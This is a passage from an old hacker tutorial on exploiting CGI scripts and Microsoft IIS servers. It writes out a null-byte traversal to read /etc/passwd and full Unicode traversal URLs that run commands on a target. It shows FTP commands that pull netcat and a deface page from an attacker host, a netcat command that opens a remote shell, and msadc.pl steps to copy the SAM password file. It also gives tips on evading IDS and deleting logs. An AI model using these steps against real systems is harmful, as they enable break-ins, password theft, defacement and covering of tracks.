
operating system through a system call. The operating system is written in


C and %00 is a string delimiter. Lets apply this technique to the


following situation.

I decide to secure my CGI. I append '.html' to any request. This means that


the user can only view html files and if they try something else then it


doesn't exist. wh00p @ me :-)

But... what if I was to do the following:

my_cgi.pl?filename=../../../../etc/passwd%00

In Perl the filename string would look like this:

"../../../../etc/passwd\0.html"

Perfectly valid under Perl. I have done my job... or have I? When this is


passed to the OS (which is written in C not Perl) the request looks like


this:

"../../../../etc/passwd"

The OS identifies %00 as the string delimiter and ignores anything that


Comes after it. The webserver then displays the /etc/passwd file... bugger :-(

Many people download scripts from the web and look for problems in the


script. Then the wiley hax0r will go to altavista and search for sites


that are using that script, eg:

url:pollit.cgi

and good old altavista provides a list of sites that are just ripe for the


taking.

The final method of exploiting CGI is via buffer overflows. Languages like


Java and Perl are immune to buffer overflows because the language looks


after memory management. Programs written in a language such as C are


vulnerable because the programmer is supposed to manage the memory. Some


programmers fail to check the size of data it is fitting into the memory


buffer and overwrites data in the stack.

The goal of the buffer overflow is to overwrite the instruction pointer


which points to the location of the next bit of code to run. An attacker


will attempt to overwrite this pointer with a new pointer that points to


attacker's code, usually a root shell.

Quite a few CGI's exist that are vulnerable to this type of attack. For


Example, counter.exe is one such CGI. By writing 2000 A's to the CGI cause


a Denial of Service (DoS).

The details of buffer overflows are beyond the scope of this document.


Look out for a future release ;-)

If you want to dig deeper in buffer overflows then have a look at:

http://www.phrack.com/phrack/49/P49-14

--[On the seventh day, God chilled and haxored the planet]

Well.. I guess its time we actually tried some of the things discussed but


I'm not going to cover everything. I suggest going to the following URL's


and searching for IIS:

http://www.securityfocus.com/


http://www.packetstormsecurity.com/

My main reason for doing this file was to better understand Unicode exploits


and so that is going to be the focus of the exploitation. The first exploit


I'm going to go through is the recent Unicode exploit for IIS4/5:

http://www.securityfocus.com/bid/1806

Before I get emails saying 'hold on, you said that %xx%xx is UTF-8" let me


explain. This had wide exposure on Bugtraq as the Unicode exploit. In


reality, this is not a Unicode sploit but a UTF-8 sploit. I'm going to keep


calling this the Unicode exploit because its now referenced by this name in


the Bugtraq archives and you'll have to search using Unicode to do further


research.

Ok, rant over... To check if the server is exploitable, request the


following URL:

http://target.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\

You should get a directory listing of the C:\ drive on the target server.


The important thing to note is that the Unicode string can vary depending


where in the world you are. Some possible alternatives include:

%c1%1c %c0%9v %c0%af %c0%qf %c1%8s %c1%9c %c1%pc

There are many more to choose from, just look at some of the Bugtraq posts or


research UTF-8 for more alternatives.

OK, you can read the directory... what next? You have the directory listing


and the ability to run commands, so you need to find the web root. By default,


the web root is at:

c:\inetpub\wwwroot\

If its not there then go and look for it. Let's write a text file there and


see if we can see it:

cmd.exe?/c+echo+owned+>+c:\inetpub\wwwroot\test.txt

hmmm.. it seems that we don't have write access. Ok, no problem we can get


around that by creating a copy of the cmd.exe that has write privileges:

cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\winnt\system32\fug.exe

Let's check if it worked:

http://target.com/scripts/..%c0%af../winnt/system32/fug.exe?/c+dir+c:\

Yep.. all's good so far. Lets try and write to the web root:

fug.exe?/c+echo+owned+>+c:\inetpub\wwwroot\test.txt

Let's open up it up in the browser and see if we can see it:

http://target.com/test.txt

w00t!!! Write access!!! Right, we now have some options open to us. In the


words of Microsoft, where do you want to go today? Working via the URL is


pretty clunky and I like the comfort of a nice command prompt, So lets do


that. I want to bring over a copy of netcat and a nice html page that I'll


use to replace the existing one.

First I need to think about the script I want to run that will get the


files I need from my FTP server:

fugscript:


open ftp.evilhaxor.com


anonymous


anon@microsoft.com


cd pub


get nc.exe


get hacked.html


quit

Right. I need to get this script onto the webserver:

fug.exe?/c+echo%20open%20ftp.evilhaxor.com>fugscript


fug.exe?/c+echo%20anonymous>>fugscript


fug.exe?/c+echo%20anon@microsoft.com>>fugscript


fug.exe?/c+echo%20cd%20pub>>fugscript


fug.exe?/c+echo%20get%20nc.exe>>fugscript


fug.exe?/c+echo%20get%20hacked.html>>fugscript


fug.exe?/c+echo%20quit>>fugscript

OK.. now we have created a script on the server called fugscript. Next step


is to execute the script and get my files from my web server.

fug.exe?/c+ftp%20-s:fugscript

If all goes well the server should begin the FTP transfer and get your files


transferred. Be patient and give it time to transfer. Now you are ready to


get netcat listening on a port. The command line for starting netcat is:

nc.exe -l -p 6667 -e cmd.exe

This tells netcat to listen (-l) on port 6667 (-p) and to spawn cmd.exe (-e)


when someone connects. The last step is to translate this command into URL


speak ;-):

fug.exe?/c+nc.exe%20-l%20-p%206667%20-e%20cmd.exe

Fire up a telnet session and connect to port 6667 on the target system and


voila... you have a cmd prompt. I really hate web defacements... so if your


going to do it then rename the existing index.htm (or default.htm) to


something like index.htm.old (give the poor admin a break, cause you can bet


your arse that he hasn't made a backup). ALSO: you are now using a system


without authorisation and as such, you are guilty under the Computer Misuse


Act in the UK and probably of something similar in your own country. If it


never occurred to you to delete the contents of c:\winnt\system32\logfiles


or the 'fugscript' file then you really shouldn't be doing this.

It just wouldn't be right to talk about IIS exploitation without mentioning


msadc.pl. rfp's perl script is a perfect example of exploit chaining. A


single exploit is not used but a chain of exploits to get the script to


work.

The exploit utilises a combination of inadequate application input validation


and default install fun. The process tries to connect to a Data Source Name


(DSN) to execute commands.

rfp's script tests for the existence /msadc/msadc.dll using the GET method.


This test will be logged and you should edit the script to make it a HEAD


request and add some URL obfuscation madness.

The default msadc.pl script uses "!ADM!ROX!YOUR!WORLD!" as the MIME


separator string. It is advised to change this string as some IDS's are


configured to identify this string.

If you want to write your own scanners then you should be looking for


headers with the content type:

application/x-varg

and of course the IIS version :-) I don't want to go into too much detail


because this is heavily documented on rfp's site:

http://www.wiretrip.net/rfp/

How do I use it? I hear you cry... well, its child's play:

./msadc2.pl -h www.target.com

If all goes well then you should be presented with the following:

command:

Its interesting to note at this point that 'cmd /c' will is run as with the


previous exploit. You can edit the script to run any other executable such


as 'rdsik /s' instead.

This is good, you can know enter the command you want to run on the server.


The previous Unicode exploit should have given you some ideas but here's a


couple that come to mind:

Example 1:


copy c:\winnt\repair\sam._ c:\inetpub\wwwroot\fug.hak

(grabbing fug.hak via your browser should give you a nice file to fire up


in L0phtcrack or JTR)

Example 2:


echo open ftp.evilhaxor.com>fugscript && echo fug>>fugscript


&& echo mypassword>>fugscript... etc. etc.




Anyway, that's about all for now. When I can be bothered I'll add some more


methods to this file. Until then, ensure your box is fully patched and the


default scripts are removed. Go have a look at the following URL and get


secure:

http://www.microsoft.com/security/

***************************************************************************


Greetz to: ReDeeMeR, BarnseyBoy, Reeferman, gabbana, think12, Wang, Enstyne,


[502BOP], Muad_Dib, Macster, n0face, palmito, kph, Homicide, Col,


Axem, Booto, _Penguin, nsh, Chawmp, shad, hellz and everyone in


#CA who are way too numerous to mention.


***************************************************************************